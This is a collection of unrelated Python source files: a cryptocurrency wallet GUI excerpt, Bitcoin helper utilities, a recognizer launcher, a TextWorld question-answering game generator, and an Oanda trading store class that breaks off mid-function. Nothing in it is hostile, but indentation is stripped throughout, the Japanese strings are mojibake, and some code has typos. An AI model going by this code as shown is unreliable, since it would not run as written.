info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
ok, msg = False, repr(e)
else:
ok, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(ok, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
display_msg = _('The server returned an error when broadcasting the transaction.')
if msg:
display_msg += '\n' + msg
display_msg = display_msg[:500]
self.show_error(display_msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
__init__.py
|
# The MIT License (MIT)
#
# Copyright (c) 2014 Richard Moore
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import hashlib
import json
import math
import os
import struct
import time
import threading
import urllib2
from . import base58
from . import bootstrap
from . import ecc
from . import key
from . import piecewise
from .hash import sha1, sha256, sha256d, ripemd160, hash160
__all__ = [
'base58', 'ecc', 'key', 'piecewise',
'sha1', 'sha256', 'sha256d', 'ripemd160', 'hash160',
'scrypt',
'hex_to_bin', 'bin_to_hex',
'get_version', 'make_version',
'default_data_directory'
# TODO: add others for import *
]
# Try finding a fast implementation of scrypt, fallback onto pyscrpyt
try:
import scrypt
_scrypt = scrypt.hash
except Exception, e:
import pyscrypt
_scrypt = pyscrypt.hash
# Hashing Algorithms
def scrypt(data, salt, N, r, p, dk_length):
return _scrypt(data, salt, N, r, p, dk_length)
def x11(data):
raise NotImplemented()
# Formatting Helpers
def commify(value):
return "{:,d}".format(value)
# Block Header Helpers
def get_block_header(version, prev_block, merkle_root, timestamp, bits, nonce):
return struct.pack('<I32s32sIII', version, prev_block, merkle_root, timestamp, bits, nonce)
def verify_target(coin, block_header):
binary_header = block_header.binary()[:80]
pow = coin.proof_of_work(binary_header)[::-1]
return pow <= get_target(block_header.bits)
def get_target(bits):
target = ((bits & 0x7fffff) * 2 ** (8 * ((bits >> 24) - 3)))
return ("%064x" % target).decode('hex')
DifficultyOneTarget = 26959535291011309493156476344723991336010898738574164086137773096960.0
def get_difficulty(bits):
return DifficultyOneTarget / ((bits & 0x7fffff) * 2 ** (8 * ((bits >> 24) - 3)))
# https://en.bitcoin.it/wiki/Protocol_specification#Merkle_Trees
def get_merkle_root(transactions):
branches = [t.hash for t in transactions]
while len(branches) > 1:
if (len(branches) % 2) == 1:
branches.append(branches[-1])
branches = [sha256d(a + b) for (a, b) in zip(branches[0::2], branches[1::2])]
return branches[0]
# Hexlify Helpers
def hex_to_bin(data):
return data.decode('hex')[::-1]
def bin_to_hex(data):
return data[::-1].encode('hex')
# Protocl Version Helpers
def get_version(version):
major = version // 1000000
minor = (version // 10000) % 100
revision = (version // 100) % 100
build = version % 100
return (major, minor, revision, build)
def make_version(major, minor, revision, build):
if not ((0 <= minor < 100) and (0 <= revision < 100) and (0 <= build < 100)):
raise ValueError('minor, revision and build must be in the range [0, 99]')
return (major * 1000000) + (minor * 10000) + (revision * 100) + build
# File Helpers
def default_data_directory():
return os.path.expanduser('~/.pycoind/data')
# QR Code
#def qrcode(data, box_size = 10, border = 4, lmqh = 'M'):
# import cStringIO as StringIO
# ec = dict(L = 1, M = 0, Q = 3, H = 2)
# qr = QRCode(box_size = box_size, border = border)
# qr.add_data(data)
# qr.make(fit = True, image_factory = PymagingImage)
# img = make_img()
# print img
# return 'foo'
def fetch_url_json_path_int(url, path):
def func():
request = urllib2.Request(url, headers = {'User-Agent': 'pycoind'})
payload = urllib2.urlopen(request).read()
try:
data = json.loads(payload)
for component in path.split('/'):
if isinstance(data, dict):
data = data[component]
elif ininstance(data, (list, tuple)):
data = data[int(component)]
else:
return None
return int(data)
except Exception, e:
print e
return None
return func
def fetch_url_int(url):
def func():
request = urllib2.Request(url, headers = {'User-Agent': 'pycoind'})
try:
return int(urllib2.urlopen(request).read())
except Exception, e:
print e
return None
return func
def guess_block_height(coin, timeout = 5.0):
result = dict()
lock = threading.Lock()
#user_agent = 'pycoind/%s' % '.'.join(str(v) for v in VERSION)
def get_block_height(name, func):
try:
block_height = func()
with lock:
result[name] = block_height
except Exception, e:
print e
threads = []
for (name, func) in coin.block_height_guess:
thread = threading.Thread(target = get_block_height, args = (name, func))
thread.daemon = True
thread.start()
threads.append(thread)
t0 = time.time()
for thread in threads:
wait_time = timeout - (time.time() - t0)
if timeout < 0: break
thread.join(wait_time)
# we copy, so lingering threads don't sneak new info in without a lock
with lock:
return result.copy()
|
recognizer.py
|
import sys
import threading
from lang_recognizer import LangEngine
from image_recognizer import ImageEngine
def lang(cmd):
print('start LangEngine')
le = LangEngine()
le.main(cmd)
def image():
print('start ImageEngine')
ie = ImageEngine()
while not event_stop.is_set():
ie.main()
if __name__=='__main__':
if len(sys.argv) == 1:
print('่ตทๅใขใผใใ้ธๆใใฆใใ ใใใ')
print('ใใญในใใขใผใ: python recognizer.py text')
print('้ณๅฃฐๅ
ฅๅใขใผใ: python recognizer.py audio')
print('็ปๅ่ช่ญใขใผใ: python recognizer.py [mode] 1')
sys.exit()
event_stop = threading.Event()
if len(sys.argv) == 3:
imge = threading.Thread(target=image,name="img",args=())
imge.start()
lang(sys.argv[1])
event_stop.set()
|
game_generator.py
|
import numpy as np
import random
import uuid
import os
import time
import multiprocessing as mp
from os.path import join as pjoin
# Set of fake words
with open("vocabularies/fake_words.txt") as f:
FAKE_WORDS = f.read().lower().split("\n")
FAKE_WORDS = set(FAKE_WORDS)
# set of all entities/objects
with open("vocabularies/entities.txt") as f:
ALL_ENTITIES = f.read().lower().split("\n")
ALL_ENTITIES = set(ALL_ENTITIES)
########################################################## question generator
def attribute_to_question(attr, object_name):
"""
creates the text question for attribute and object.
:param attr: the attribute to create question about.
:param object_name: the object to ask about.
:return res: the question.
"""
if attr == "edible":
res = "is " + object_name + " edible ?"
elif attr == "drinkable":
res = "is " + object_name + " drinkable ?"
elif attr == "portable":
res = "can one put " + object_name + " into pocket ?"
elif attr == "openable":
res = "is it possible to open " + object_name + " ?"
elif attr == "cuttable":
res = "can " + object_name + " be cut ?"
elif attr == "sharp":
res = "can one cut anything with a " + object_name + " ?"
elif attr == "heat_source":
res = "can one cook things with the " + object_name + " ?"
elif attr == "cookable":
res = "can the " + object_name + " be cooked ?"
elif attr == "holder":
res = "can " + object_name + " hold things ?"
else:
print("Unknown: {}".format(attr))
raise NotImplementedError
return res
def generate_location_question(entity_dict, seed=None):
"""
Generate a random question about object location based on environment
:param entity_dict: dictionary of objects and their locations in environment. {entity: location}
:return : random question about object location in world
"""
# entity_dict is a dict of {entity: location}
entities, locations = [], []
for item in entity_dict:
if item == "" or entity_dict[item] == "":
continue
loc = entity_dict[item]
item, loc = item.lower(), loc.lower()
# use most immediate container as answer
if "." in loc:
loc = loc.rsplit(".")[-1]
# filter out multi-word locations
if " " in loc:
continue
entities.append(item)
locations.append(loc)
if seed is not None:
np.random.seed(seed)
idx = np.random.randint(low=0, high=len(entities))
return "where is the " + entities[idx] + " ?", locations[idx], entities[idx]
def generate_attribute_question(entity_dict, seed=None):
"""
Generate random attribute question about environment
:param entity_dict: is a dict of {entity: attribute}
:return: text question about attribute.
:return answer: the answer to the question.
:return random_attr: the attribute chosen to ask about.
:return entity_: the object chosen to ask about.
"""
# entity_dict is a dict of {entity: attribute}
if seed is not None:
np.random.seed(seed)
all_attributes = set(["edible", "drinkable", "portable", "openable",
"cuttable", "sharp", "heat_source", "cookable",
"holder"])
all_entities = set()
attribute_dict = dict()
for item in entity_dict:
if item not in FAKE_WORDS:
continue
attrs_of_this_obj = list(set(entity_dict[item]) & all_attributes)
for attr in attrs_of_this_obj:
if attr not in attribute_dict:
attribute_dict[attr] = set()
attribute_dict[attr].add(item)
all_entities.add(item)
all_attributes = sorted([key for key in attribute_dict])
random_attr = np.random.choice(all_attributes)
entity_true = attribute_dict[random_attr]
entity_false = sorted(all_entities - entity_true)
entity_true = sorted(entity_true)
if len(entity_false) == 0 or len(entity_true) == 0:
assert False, "Contact Marc if this happens!"
#if seed is not None:
# seed = seed + 1
# return generate_attribute_question(entity_dict, seed)
if np.random.rand() > 0.5:
answer = "1"
entity_ = np.random.choice(entity_true)
else:
answer = "0"
entity_ = np.random.choice(entity_false)
return attribute_to_question(random_attr, entity_), answer, random_attr, entity_
def generate_existence_question(entity_dict, seed=None):
"""
Generate a random question about an objects existence.
:param entity_dict: dictionary about objects locations in the form {entity: location}
:return : text question about object existence.
"""
# entity_dict is a dict of {entity: location}
entities_in_this_game = []
for item in entity_dict:
item = item.lower()
if item == "" or entity_dict[item] == "":
continue
entities_in_this_game.append(item)
entities_not_in_this_game = list(ALL_ENTITIES - set(entities_in_this_game) - FAKE_WORDS)
if seed is not None:
np.random.seed(seed)
if np.random.rand() > 0.5:
entity = np.random.choice(entities_in_this_game)
return "is there any " + entity + " in the world ?", "1", entity
else:
entity = np.random.choice(entities_not_in_this_game)
return "is there any " + entity + " in the world ?", "0", entity
def generate_qa_pairs(infos, question_type="location", seed=42):
"""
Generate question answer pairs based on environment info and question type for each game in batch.
:param infos: Gym Environment infos dictionary containing specific information about the environment.
:param question_type: The type of question to generate.
:return output_questions: list of the output questions.
:return output_answers: list of the output answers.
:return reward_helper_info: dictionary containing relevant question and environment information for reward shaping.
"""
output_questions, output_answers = [], []
reward_helper_info = {"batch_size": len(infos["extra.object_locations"]),
"_entities": [],
"_answers": [],
"_attributes": []}
# For each environment in the batch
for i in range(len(infos["extra.object_locations"])):
if question_type == "location":
_q, _a, _e = generate_location_question(infos["extra.object_locations"][i], seed=seed * len(infos["extra.object_locations"]) + i)
elif question_type == "attribute":
_q, _a, _attr, _e = generate_attribute_question(infos["extra.object_attributes"][i], seed=seed * len(infos["extra.object_locations"]) + i)
reward_helper_info["_attributes"].append(_attr)
elif question_type == "existence":
_q, _a, _e = generate_existence_question(infos["extra.object_locations"][i], seed=seed * len(infos["extra.object_locations"]) + i)
else:
raise NotImplementedError
output_questions.append(_q)
output_answers.append(_a)
reward_helper_info["_entities"].append(_e) # the entity being asked
reward_helper_info["_answers"].append(_a) # the entity being asked
return output_questions, output_answers, reward_helper_info
########################################################## game generator
def generate_fixed_map_games(p_num, path="./", question_type="location", random_seed=None, num_object=None):
"""
Generate a fixed map game
:param p_num: used in random name creation for game.
:param path: path to create gamefile.
:param question_type: used only to decide whether or not to use placeholders in game creation
:param num_object: number of objects to create in world.
:return gamefile: the directory of the created textworld gamefile
"""
if random_seed is None:
np.random.seed()
else:
np.random.seed(random_seed)
# generate fixed map games
map_seed = 123
num_room = 6
if num_object is None:
num_object = np.random.randint(low=num_room * 3, high=num_room * 6 + 1)
if random_seed is None:
random_seed = np.random.randint(100000000)
with_placeholders = question_type == "attribute"
random_game_name = str(uuid.uuid1()) + str(p_num)
config_list = [str(num_room), str(num_object), str(map_seed), str(with_placeholders), str(random_seed)]
random_game_name += "_config_" + "_".join(config_list)
gamefile = pjoin(path, "game_" + random_game_name + ".ulx")
cmd = "tw-make tw-iqa --nb-rooms " + str(num_room) + " --nb-entities " + str(num_object) + " --seed-map " + str(map_seed) + (" --with-placeholders" if with_placeholders else "") +\
" --third-party challenge.py --seed " + str(random_seed) + " --output " + gamefile + " --silent --kb " + pjoin(path, "textworld_data")
os.system(cmd)
return gamefile
def generate_random_map_games(p_num, path="./", question_type="location", random_seed=None, num_room=None, num_object=None):
"""
Generate a random map game
:param p_num: used in random name creation for game.
:param path: path to create gamefile.
:param question_type: used only to decide whether or not to use placeholders in game creation
:param num_room: number of rooms to create in world.
:param num_object: number of objects to create in world.
:return gamefile: the directory of the created textworld gamefile
"""
if random_seed is None:
np.random.seed()
else:
np.random.seed(random_seed)
# generate random map games
num_room_lower_bound = 2
num_room_upper_bound = 12
if num_room is None:
num_room = np.random.randint(low=num_room_lower_bound, high=num_room_upper_bound + 1)
with_placeholders = question_type == "attribute"
if with_placeholders:
num_room = max(num_room, 2) # Placeholder option requires at least two rooms.
if num_object is None:
num_object = np.random.randint(low=num_room * 3, high=num_room * 6 + 1)
if random_seed is None:
random_seed = np.random.randint(100000000)
map_seed = random_seed
random_game_name = str(uuid.uuid1()) + str(p_num)
config_list = [str(num_room), str(num_object), str(map_seed), str(with_placeholders), str(random_seed)]
random_game_name += "_config_" + "_".join(config_list)
gamefile = pjoin(path, "game_" + random_game_name + ".ulx")
cmd = "tw-make tw-iqa --nb-rooms " + str(num_room) + " --nb-entities " + str(num_object) + " --seed-map " + str(map_seed) + (" --with-placeholders" if with_placeholders else "") +\
" --third-party challenge.py --seed " + str(random_seed) + " --output " + gamefile + " --silent --kb " + pjoin(path, "textworld_data")
os.system(cmd)
return gamefile
def game_generator_queue(path="./", random_map=False, question_type="location", max_q_size=30, wait_time=0.5, nb_worker=1):
"""
create an asynchronous queue of game files for the unlimited games setting.
"""
q = mp.Queue()
nb_worker = min(nb_worker, mp.cpu_count() - 1)
def data_generator_task(p_num):
counter = 0
while True:
np.random.seed(p_num * 12345 + counter)
seed = np.random.randint(100000000)
if q.qsize() < max_q_size:
try:
if random_map:
game_file_name = generate_random_map_games(p_num, path=path, question_type=question_type, random_seed=seed)
else:
game_file_name = generate_fixed_map_games(p_num, path=path, question_type=question_type, random_seed=seed)
except ValueError:
continue
q.put(game_file_name)
else:
time.sleep(wait_time)
counter += 1
generator_processes = [mp.Process(target=data_generator_task, args=(p_num,)) for p_num in range(nb_worker)]
for p in generator_processes:
p.daemon = True
p.start()
return q
def game_generator(path="./", random_map=False, question_type="location", train_data_size=1):
"""
Generate all the games for training.
:param path: the path where to create the games.
:param random_map: boolean for whether to create random map games or fixed.
:param question_type: the type of question of games to generate.
:param train_data_size: the number of training games to create.
:return res: a list of game file directory locations
"""
print("Generating %s games..." % str(train_data_size))
res = set()
if random_map:
this_many_rooms = np.linspace(2, 12, train_data_size + 2)[1:-1]
this_many_rooms = [int(item) for item in this_many_rooms]
this_many_objects = []
for i in range(len(this_many_rooms)):
# ith game
tmp = np.linspace(this_many_rooms[i] * 3, this_many_rooms[i] * 6, train_data_size + 2)[1:-1]
tmp = [int(item) for item in tmp]
if tmp[i] <= this_many_rooms[i] * 3:
tmp[i] = this_many_rooms[i] * 3 + 1
this_many_objects.append(tmp[i])
else:
this_many_rooms = 6
this_many_objects = np.linspace(this_many_rooms * 3, this_many_rooms * 6, train_data_size + 2)[1:-1]
this_many_objects = [int(item) for item in this_many_objects]
for i in range(len(this_many_objects)):
if this_many_objects[i] <= this_many_rooms * 3:
this_many_objects[i] = this_many_rooms * 3 + 1
while(True):
if len(res) == train_data_size:
break
_id = len(res)
try:
if random_map:
game_file_name = generate_random_map_games(len(res), path=path, question_type=question_type, random_seed=123 + _id, num_room=this_many_rooms[_id], num_object=this_many_objects[_id])
else:
game_file_name = generate_fixed_map_games(len(res), path=path, question_type=question_type, random_seed=123 + _id, num_object=this_many_objects[_id])
except ValueError:
continue
res.add(game_file_name)
print("Done generating games...")
return list(res)
|
oandav20store.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import collections
import threading
import copy
import json
import time as _time
from datetime import datetime, timezone
import v20
import backtrader as bt
from backtrader.metabase import MetaParams
from backtrader.utils.py3 import queue, with_metaclass
from .oandaposition import OandaPosition
class SerializableEvent(object):
'''A threading.Event that can be serialized.'''
def __init__(self):
self.evt = threading.Event()
def set(self):
return self.evt.set()
def clear(self):
return self.evt.clear()
def isSet(self):
return self.evt.isSet()
def wait(self, timeout=0):
return self.evt.wait(timeout)
def __getstate__(self):
d = copy.copy(self.__dict__)
if self.evt.isSet():
d['evt'] = True
else:
d['evt'] = False
return d
def __setstate__(self, d):
self.evt = threading.Event()
if d['evt']:
self.evt.set()
class MetaSingleton(MetaParams):
'''Metaclass to make a metaclassed class a singleton'''
def __init__(cls, name, bases, dct):
super(MetaSingleton, cls).__init__(name, bases, dct)
cls._singleton = None
def __call__(cls, *args, **kwargs):
if cls._singleton is None:
cls._singleton = (
super(MetaSingleton, cls).__call__(*args, **kwargs))
return cls._singleton
class OandaV20Store(with_metaclass(MetaSingleton, object)):
'''Singleton class wrapping to control the connections to Oanda v20.
Params:
- ``token`` (default:``None``): API access token
- ``account`` (default: ``None``): account id
- ``practice`` (default: ``False``): use the test environment
- ``account_poll_freq`` (default: ``5.0``): refresh frequency for
account value/cash refresh
- ``stream_timeout`` (default: ``2``): timeout for stream requests
- ``poll_timeout`` (default: ``2``): timeout for poll requests
- ``reconnections`` (default: ``-1``): try to reconnect forever
connection errors
- ``reconntimeout`` (default: ``5.0``): how long to wait to reconnect
stream (feeds have own reconnection settings)
- ``notif_transactions`` (default: ``False``): notify store of all recieved
transactions
'''
params = dict(
token='',
account='',
practice=False,
# account balance refresh timeout
account_poll_freq=5.0,
# stream timeout
stream_timeout=2,
# poll timeout
poll_timeout=2,
# count of reconnections, -1 unlimited, 0 none
reconnections=-1,
# timeout between reconnections
reconntimeout=5.0,
# send store notification with recieved transactions
notif_transactions=False,
)
BrokerCls = None # broker class will auto register
DataCls = None # data class will auto register
# Oanda supported granularities
'''S5, S10, S15, S30, M1, M2, M3, M4, M5, M10, M15, M30, H1,
H2, H3, H4, H6, H8, H12, D, W, M'''
_GRANULARITIES = {
(bt.TimeFrame.Seconds, 5): 'S5',
(bt.TimeFrame.Seconds, 10): 'S10',
(bt.TimeFrame.Seconds, 15): 'S15',
(bt.TimeFrame.Seconds, 30): 'S30',
(bt.TimeFrame.Minutes, 1): 'M1',
(bt.TimeFrame.Minutes, 2): 'M2',
(bt.TimeFrame.Minutes, 3): 'M3',
(bt.TimeFrame.Minutes, 4): 'M4',
(bt.TimeFrame.Minutes, 5): 'M5',
(bt.TimeFrame.Minutes, 10): 'M10',
(bt.TimeFrame.Minutes, 15): 'M15',
(bt.TimeFrame.Minutes, 30): 'M30',
(bt.TimeFrame.Minutes, 60): 'H1',
(bt.TimeFrame.Minutes, 120): 'H2',
(bt.TimeFrame.Minutes, 180): 'H3',
(bt.TimeFrame.Minutes, 240): 'H4',
(bt.TimeFrame.Minutes, 360): 'H6',
(bt.TimeFrame.Minutes, 480): 'H8',
(bt.TimeFrame.Minutes, 720): 'H12',
(bt.TimeFrame.Days, 1): 'D',
(bt.TimeFrame.Weeks, 1): 'W',
(bt.TimeFrame.Months, 1): 'M',
}
# Order type matching with oanda
_ORDEREXECS = {
bt.Order.Market: 'MARKET',
bt.Order.Limit: 'LIMIT',
bt.Order.Stop: 'STOP',
bt.Order.StopTrail: 'TRAILING_STOP_LOSS'
}
# transactions which will be emitted on creating/accepting a order
_X_CREATE_TRANS = ['MARKET_ORDER',
'LIMIT_ORDER',
'STOP_ORDER',
'TAKE_PROFIT_ORDER',
'STOP_LOSS_ORDER',
'MARKET_IF_TOUCHED_ORDER',
'TRAILING_STOP_LOSS_ORDER']
# transactions which filled orders
_X_FILL_TRANS = ['ORDER_FILL']
# transactions which cancelled orders
_X_CANCEL_TRANS = ['ORDER_CANCEL']
# transactions which were rejected
_X_REJECT_TRANS = ['MARKET_ORDER_REJECT',
'LIMIT_ORDER_REJECT',
'STOP_ORDER_REJECT',
'TAKE_PROFIT_ORDER_REJECT',
'STOP_LOSS_ORDER_REJECT',
'MARKET_IF_TOUCHED_ORDER_REJECT',
'TRAILING_STOP_LOSS_ORDER_REJECT']
# transactions which can be ignored
_X_IGNORE_TRANS = ['DAILY_FINANCING',
'CLIENT_CONFIGURE']
# Date format used
_DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.%f000Z'
# Oanda api endpoints
_OAPI_URL = ['api-fxtrade.oanda.com',
'api-fxpractice.oanda.com']
_OAPI_STREAM_URL = ['stream-fxtrade.oanda.com',
'stream-fxpractice.oanda.com']
@classmethod
def getdata(cls, *args, **kwargs):
'''Returns ``DataCls`` with args, kwargs'''
return cls.DataCls(*args, **kwargs)
@classmethod
def getbroker(cls, *args, **kwargs):
'''Returns broker with *args, **kwargs from registered ``BrokerCls``'''
return cls.BrokerCls(*args, **kwargs)
def __init__(self):
'''Initialization'''
super(OandaV20Store, self).__init__()
self.notifs = collections.deque() # store notifications for cerebro
self._cash = 0.0 # margin available, currently available cash
self._value = 0.0 # account balance
self._currency = None # account currency
self._leverage = 1 # leverage
self._client_id_prefix = str(datetime.now().timestamp())
self.broker = None # broker instance
self.datas = list() # datas that have registered over start
self._env = None # reference to cerebro for general notifications
self._evt_acct = SerializableEvent()
self._orders = collections.OrderedDict() # map order.ref to order id
self._trades = collections.OrderedDict() # map order.ref to trade id
self._server_positions = collections.defaultdict(OandaPosition)
# init oanda v20 api context
self.oapi = v20.Context(
self._OAPI_URL[int(self.p.practice)],
poll_timeout=self.p.poll_timeout,
port=443,
ssl=True,
token=self.p.token,
datetime_format='UNIX',
)
# init oanda v20 api stream context
self.oapi_stream = v20.Context(
self._OAPI_STREAM_URL[int(self.p.practice)],
stream_timeout=self.p.stream_timeout,
port=443,
ssl=True,
token=self.p.token,
datetime_format='UNIX',
)
def start(self, data=None, broker=None):
# datas require some processing to kickstart data reception
if data is None and broker is None:
self.cash = None
return
if data is not None:
self._env = data._env
# For datas simulate a queue with None to kickstart co
self.datas.append(data)
if self.broker is not None:
self.broker.data_started(data)
elif broker is not None:
self.broker = broker
self.streaming_events()
self.broker_threads()
def stop(self):
# signal end of thread
if self.broker is not None:
self.q_ordercreate.put(None)
self.q_orderclose.put(None)
self.q_account.put(None)
def put_notification(self, msg, *args, **kwargs):
'''Adds a notification'''
self.notifs.append((msg, args, kwargs))
def get_notifications(self):
'''Return the pending "store" notifications'''
self.notifs.append(None) # put a mark / threads could still append
return [x for x in iter(self.notifs.popleft, None)]
def get_positions(self):
'''Returns the currently open positions'''
try:
response = self.oapi.position.list_open(self.p.account)
pos = response.get('positions', 200)
# convert positions to dict
for idx, val in enumerate(pos):
pos[idx] = val.dict()
_utc_now = datetime.utcnow()
for p in pos:
size = float(p['long']['units']) + float(p['short']['units'])
price = (
float(p['long']['averagePrice']) if size > 0
else float(p['short']['averagePrice']))
self._server_positions[p['instrument']] = OandaPosition(size, price, dt=_utc_now)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return pos
except NameError:
return None
def get_server_position(self, update_latest = False):
if update_latest:
self.get_positions()
return self._server_positions
def get_granularity(self, timeframe, compression):
'''Returns the granularity useable for oanda'''
return self._GRANULARITIES.get((timeframe, compression), None)
def get_instrument(self, dataname):
'''Returns details about the requested instrument'''
try:
response = self.oapi.account.instruments(
self.p.account,
instruments=dataname)
inst = response.get('instruments', 200)
# convert instruments to dict
for idx, val in enumerate(inst):
inst[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return inst[0]
except NameError:
return None
def get_instruments(self, dataname):
'''Returns details about available instruments'''
try:
response = self.oapi.account.instruments(
self.p.account,
instruments=dataname)
inst = response.get('instruments', 200)
# convert instruments to dict
for idx, val in enumerate(inst):
inst[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return inst
except NameError:
return None
def get_pricing(self, dataname):
'''Returns details about current price'''
try:
response = self.oapi.pricing.get(self.p.account,
instruments=dataname)
prices = response.get('prices', 200)
# convert prices to dict
for idx, val in enumerate(prices):
prices[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return prices[0]
except NameError:
return None
def get_pricings(self, dataname):
'''Returns details about current prices'''
try:
response = self.oapi.pricing.get(self.p.account,
instruments=dataname)
prices = response.get('prices', 200)
# convert prices to dict
for idx, val in enumerate(prices):
prices[idx] = val.dict()
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return prices
except NameError:
return None
def get_transactions_range(self, from_id, to_id, exclude_outer=False):
'''Returns all transactions between range'''
try:
